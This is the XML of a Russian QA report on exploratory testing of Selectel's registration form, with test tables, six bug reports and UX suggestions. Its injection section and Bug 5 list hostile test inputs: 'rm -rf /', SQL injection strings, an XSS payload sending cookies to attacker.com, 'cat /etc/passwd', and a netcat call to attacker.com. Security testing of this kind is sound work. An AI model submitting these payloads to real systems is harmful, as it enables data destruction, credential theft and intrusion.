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[Задание 2: https://github.com/Neket27/qa_selectel]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Задание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Откройте страницу регистрации в панели управления Selectel https://my.selectel.ru/registration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Проведите исследовательское тестирование процесса регистрации нового пользователя в панели управления Selectel.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Опишите проверки, результаты и найденные дефекты в документе (формат на ваш выбор: Google Docs, PDF и др.) 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1d1d1f"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. (Опционально) Оцените удобство процесса регистрации, добавьте в ваш документ вопросы/рекомендации относительно удобства этого процесса для клиентов.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8ugtjkukbpd8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Проверка обязательных полей</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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85"/>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="2955"/>
        <w:gridCol w:w="1005"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2085"/>
            <w:gridCol w:w="3000"/>
            <w:gridCol w:w="2955"/>
            <w:gridCol w:w="1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Фактический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Отправка пустой формы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Появляются ошибки валидации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Отправка пустой формы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Чекбокс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92433"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">новостных рассылок</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> установлен;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Появляются ошибки валидации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92433"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Электронная почта</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> пустая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Test_selectel_1;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Показать сообщение об ошибке по почте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color w:val="092433"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Электронная почта</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> пустая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Test_selectel_1;</w:t>
            </w:r>
          </w:p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Чекбокс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92433"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">новостных рассылок</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> установлен;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Показать сообщение об ошибке по почте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Пароль пустой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test_selectel@mail.ru;</w:t>
            </w:r>
          </w:p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Показать ошибку по паролю</w:t>
            </w:r>
          </w:p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Пароль пустой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test_selectel@mail.ru;</w:t>
            </w:r>
          </w:p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Чекбокс новостных рассылок установлен;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Показать ошибку по паролю</w:t>
            </w:r>
          </w:p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Валидация Email</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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85"/>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="2235"/>
        <w:gridCol w:w="1725"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2085"/>
            <w:gridCol w:w="3000"/>
            <w:gridCol w:w="2235"/>
            <w:gridCol w:w="1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Фактический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email без @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test_selectelmail.ru;</w:t>
            </w:r>
          </w:p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Test_selectel_1;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Ошибка валидации почты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email без домена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test_selectel@mail;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Test_selectel_1;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Ошибка валидации почты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email уже зарегистрирован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test_selectel@mail.ru;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Test_selectel_1;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Предупреждение, что пользователь с таким email уже зарегистрирован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Регистрация, проходит несколько раз с одним email</w:t>
            </w:r>
          </w:p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62025" cy="7874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email с русскими буквами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Тест_selectel@mail.ru;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Test_selectel_1;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Ошибка валидации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Сервер отвечает </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="092433"/>
                <w:shd w:fill="fff1f0" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">500 Internal Server Error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962025" cy="800100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k2o4wubgy933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Проверка пароля</w:t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85"/>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="2235"/>
        <w:gridCol w:w="1725"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2085"/>
            <w:gridCol w:w="3000"/>
            <w:gridCol w:w="2235"/>
            <w:gridCol w:w="1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Фактический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Короткий пароль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test_selectel@mail.ru;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Selectel_1;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360" w:before="60" w:line="342.85714285714283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Подсказка: Используйте не менее 12 символов, цифры, латинские буквы разных регистров и спецсимволы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Пароль без цифр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test_selectel@mail.ru;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Test_selectel_t;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360" w:before="60" w:line="342.85714285714283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Подсказка: Используйте не менее 12 символов, цифры, латинские буквы разных регистров и спецсимволы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Пароль без спец символа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test_selectel@mail.ru;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Test_selectel1;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360" w:before="60" w:line="342.85714285714283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Подсказка: Используйте не менее 12 символов, цифры, латинские буквы разных регистров и спецсимволы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Выпадают предупреждения по кроткому паролю в форме слева</w:t>
            </w:r>
          </w:p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 подсказка, но при этом регистрация проходит успешно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Пароль без заглавных регистров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test_selectel@mail.ru;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test_selectel_1;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360" w:before="60" w:line="342.85714285714283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Подсказка: Используйте не менее 12 символов, цифры, латинские буквы разных регистров и спецсимволы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Пароль с русскими буквами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test_selectel@mail.ru;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Tест_selectel_1;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360" w:before="60" w:line="342.85714285714283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Подсказка: Используйте не менее 12 символов, цифры, латинские буквы разных регистров и спецсимволы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Генерация пароля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test_selectel@mail.ru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360" w:before="60" w:line="342.85714285714283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Пароль сгенерирован со всеми нужными ограничениями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360" w:before="60" w:line="342.85714285714283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Пароль сгенерирован со всеми нужными ограничениями</w:t>
            </w:r>
          </w:p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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p2ecjub9ukw6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Проверка подтверждения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60"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1290"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1845"/>
            <w:gridCol w:w="2655"/>
            <w:gridCol w:w="1680"/>
            <w:gridCol w:w="1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Фактический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Письмо приходит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зарегистрирован;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Нажатие на кнопку подтверждения почты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Приходит письмо  после регистрации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открывается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Подтверждение происходит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Повторное использование ссылки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92433"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ссылка для подтверждения электронной почты некорректна или срок ее действия истек.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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="092433"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z3adlb9hzw4h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Заполнение профиля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60"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1290"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1845"/>
            <w:gridCol w:w="2655"/>
            <w:gridCol w:w="1680"/>
            <w:gridCol w:w="1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Предусловия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Фактический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Чекбокс п</w:t>
            </w:r>
            <w:hyperlink r:id="rId8">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:highlight w:val="white"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">ользовательского соглашения</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> не выбран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прошел авторизацию;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Страна резидентства: Тунис;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аккаунта: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Личный аккаунт;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924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Фамилия: Кульга;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Имя: Никита;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Отчество: Иванович;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color w:val="092433"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white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Подсказка: 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Необходимо отметить чекбокс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Пустое поле фамилии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прошел авторизацию;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Страна резидентства: Тунис;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Тип аккаунта: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Личный аккаунт;</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Имя: Никита;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Отчество: Иванович;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Чекбокс п</w:t>
            </w:r>
            <w:hyperlink r:id="rId9">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:highlight w:val="white"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">ользовательского соглашения</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> выбран;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Подсказка: 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Необходимо заполнить это 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Поле поле имени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Страна резидентства: Тунис;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Тип аккаунта: Личный аккаунт;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0924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Фамилия: Кульга;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Отчество: Иванович;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Чекбокс п</w:t>
            </w:r>
            <w:hyperlink r:id="rId10">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:highlight w:val="white"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">ользовательского соглашения</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> выбран;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Подсказка: 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Необходимо заполнить это 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Пустое имя фамилии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Страна резидентства: Тунис;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Тип аккаунта: Личный аккаунт;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Имя: Никита;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0924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Фамилия: Кульга;</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">Отчество: Иванович;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Чекбокс п</w:t>
            </w:r>
            <w:hyperlink r:id="rId11">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:highlight w:val="white"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">ользовательского соглашения</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> выбран;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Подсказка: Необязательно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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bfnnk0oqxphz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Проверка номера телефона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60"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1290"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1845"/>
            <w:gridCol w:w="2655"/>
            <w:gridCol w:w="1680"/>
            <w:gridCol w:w="1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Предусловия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Фактический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Автоматический ввод кода страны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прошел авторизацию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 страны уставился верно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пустой номер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прошел авторизацию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Подсказка: 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Необходимо заполнить это поле;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Номер с буквами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прошел авторизацию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999QQQ9999;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Подсказка:  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Неверный тип телефона. Введите мобильный номер;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Невалидный длинный номер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прошел авторизацию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99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999;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Подсказка:  Неверный тип телефона. Введите мобильный номер;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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5mr2bolp0b85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Проверка SMS подтверждения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60"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1290"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1845"/>
            <w:gridCol w:w="2655"/>
            <w:gridCol w:w="1680"/>
            <w:gridCol w:w="1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Предусловия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Фактический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 приходит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нажал на кнопку “Запросить код”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SMS  с кодом для подтверждения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Ввод неверного кода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9999;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Неверный код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Просроченный код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 из SMS;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Аккаунт готов к работе!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5as1n2f3tcgb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Проверка регистрации из другой страны</w:t>
      </w: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60"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1290"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1845"/>
            <w:gridCol w:w="2655"/>
            <w:gridCol w:w="1680"/>
            <w:gridCol w:w="1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Предусловия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Фактический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Регистрация  с валидными данными из другой страны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Использовался proxy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test_selectel@mail.ru;</w:t>
            </w:r>
          </w:p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Test_selectel_1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Успешная регистрация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Доступ с IP-адреса 2a01:ecc0:200:43b::2 запрещён. Обратитесь в службу поддержки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685800" cy="6477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o6bizll96cs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c8tqknadpm03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Инъекции</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9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60"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1290"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1845"/>
            <w:gridCol w:w="2655"/>
            <w:gridCol w:w="1680"/>
            <w:gridCol w:w="1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Предусловия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Фактический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Инъекции на удаление файлов системы с помощью команды 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test_selectel@mail.ru; rm -rf /</w:t>
            </w:r>
          </w:p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Ошибка валидации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color w:val="092433"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:fill="fff1f0" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ошибка сервера. Повторите запрос позднее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Инъекции на удаление файлов системы с помощью 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admin'-- </w:t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' OR 1=1-- </w:t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" OR ""="</w:t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admin@company.com' UNION SELECT password FROM users WHERE id=1-- </w:t>
            </w:r>
          </w:p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Ошибка валидации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color w:val="092433"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:fill="fff1f0" w:val="clear"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="092433"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:fill="fff1f0" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ошибка сервера. Повторите запрос позднее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Инъекции на удаление файлов системы с помощью  JavaScript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"&gt;&lt;img src=x onerror=fetch('https://attacker.com?cookie=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Неверный формат почты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sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:fill="fff1f0" w:val="clear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Инъекции на удаление файлов системы с помощью  </w:t>
            </w:r>
          </w:p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Template Injection (SSTI)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{{7*7}}</w:t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${{7*7}}</w:t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&lt;%= 7*7 %&gt;</w:t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Неверный формат почты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ОК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  <w:color w:val="1d1d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Инъекции на удаление файлов системы с помощью  </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command Injection (через обработку почты</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1d1d1f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user@example.com; cat /etc/passwd</w:t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user@example.com &amp;&amp; whoami</w:t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user@example.com | nc attacker.com 4444</w:t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Неверный формат почты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092433"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:fill="fff1f0" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ошибка сервера. Повторите запрос позднее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pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="274.2857142857143" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jbu3fbiq1rf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hd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="274.2857142857143" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z7186yy9r2sh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DoS-атака</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10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60"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1290"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1845"/>
            <w:gridCol w:w="2655"/>
            <w:gridCol w:w="1680"/>
            <w:gridCol w:w="1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Предусловия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Фактический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Регистрация большого количества пользователь с одного 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Валидный email и пароль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Блокировка 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Блокировка ip</w:t>
            </w:r>
          </w:p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85800" cy="6858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29zlfmasr4pd" w:id="11"/>
      <w:bookmarkEnd w:id="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Тайминги</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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60"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="1290"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1560"/>
            <w:gridCol w:w="1845"/>
            <w:gridCol w:w="2655"/>
            <w:gridCol w:w="1680"/>
            <w:gridCol w:w="1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Предусловия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Фактический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Напоминание заполнить профиль после регистрации через день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Зарегистрироваться, но не заполнять профиль данными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Валидные данные для регистрации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Уведомление на почту о том, что необходимо завершить регистрацию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ОК</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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6qu4unbfwujx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Найденные дефекты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301pb6u8x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Bug 1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Название:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Регистрация  пользователя с уже зарегистрированным email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Открыть страницу регистрации;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валидный email и пароль;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Нажать на чекбокс согласия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Нажать на кнопку регистрации;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Выйти из кабинета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Перейти на страницу регистрации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данные  зарегистрированного пользователя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Нажать на кнопку регистрации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Фактический результат:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Пользователь зарегистрировался.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  <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Вход в кабинет пользователя или предупреждение в подсказке о том, что пользователь зарегистрирован.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d1d1f"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Major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13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15657" cy="231933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5657" cy="2319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Комментарий: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Обычно у каждого пользователя уникальный email.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Нужно посмотреть ТЗ или уточнить у Аналитика или Разработчика: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">является ли уникальность Email обязательным требованием в системе. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Если да, то это баг с высокими приоритетами. Если нет - то это не баг.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lw9wtyjcr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Bug 2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Название:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Регистрация пользователя с email,  в котором содержатся русские буквы.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Шаги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Открыть страницу регистрации;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email с русскими символами;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Нажать на чекбокс согласия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Нажать зарегистрироваться;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результат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Сервер отвечает </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="092433"/>
          <w:shd w:fill="fff1f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">500 Internal Server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Подсказка о невалидном email.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d1d1f"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Major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d1d1f"/>
          <w:highlight w:val="white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kmb1lvhj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Bug 3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Название:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Регистрация с паролем без спецсимволов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Шаги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Открыть страницу с формой регистрации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валидный email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пароль без спецсимволов (Testselectel1)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Нажать на чекбокс согласия</w:t>
        <w:br w:type="textWrapping"/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результат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Регистрация проходит успешно.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Подсказка о невалидности пароля и запрет регистрации, пока не будет исправлен пароль на валидный.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d1d1f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Major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color w:val="1d1d1f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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uljjat34l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Bug 4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Название:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Регистрация пользователя с валидными данными через proxy server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Шаги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Подключится к удалённому серверу через vpn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Зайти на страницу регистрации пользователя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валидные данные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Нажать на чекбокс согласия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Нажать на кнопку регистрации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результат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color w:val="092433"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="fff1f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Доступ с IP-адреса 2a01:ecc0:200:43b::2 запрещён. Обратитесь в службу поддержки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Регистрация проходит успешно.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d1d1f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Major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14863" cy="469152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691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esl9t34ql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Bug 5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Название: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d1d1f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Регистрация пользователя с командой инъекции в поле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Шаги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Открыть страницу регистрации;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Ввести команды инъекций по очереди для каждой регистрации&lt;&lt;test_selectel@mail.ru; rm -rf /)&gt;&gt; ,&lt;&lt;(admin'-- ' OR 1=1-- " OR ""="admin@company.com' UNION SELECT password FROM users WHERE id=1-- )&gt;&gt;, &lt;&lt;user@example.com; cat /etc/passwd user@example.com &amp;&amp; whoami user@example.com | nc attacker.com 4444&gt;&gt;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пароль;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Нажать на чекбокс согласия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Нажать на кнопку регистрации;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результат</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="092433"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="fff1f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ошибка сервера. Повторите запрос позднее.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Ожидаемый результат.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Неверный формат почты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d1d1f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical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17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00513" cy="466571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4665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flzedvi1y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Bug 6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Название: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Дублирование сегмента «profile» в URL пути страницы профиля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Авторизоваться в панели управления Selectel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Перейти в аккаунт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Обратить внимание на адресную строку браузера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результат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URL страницы содержит дублирование сегмента: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://my.selectel.ru/profile/profile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 страницы должен содержать единственный сегмент профиля: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://my.selectel.ru/profile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d1d1f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Minor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Оцените удобство процесса регистрации, добавьте в ваш документ вопросы/рекомендации относительно удобства этого процесса для клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180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Отсутствие альтернативных способов регистрации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На форме отсутствуют альтернативные способы регистрации, например: Google, Яндекс.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Для сервиса, связанного с IT-инфраструктурой, многие пользователи могли бы предпочесть быстрый вход через сторонние сервисы.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Потенциальная проблема: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  <w:t xml:space="preserve">Увеличивается время регистрации и количество отказов.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Рекомендация:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Добавить OAuth регистрацию.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Это: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ускорит регистрацию, снизит количество ошибок, улучшит conversion rate.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При перезагрузке страницы регистрации все введённые данные формы удаляются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UX consideration: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Если пользователь случайно перезагрузит страницу, введённые данные (например email) будут потеряны, что может ухудшить пользовательский опыт.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Рекомендация: </w:t>
      </w:r>
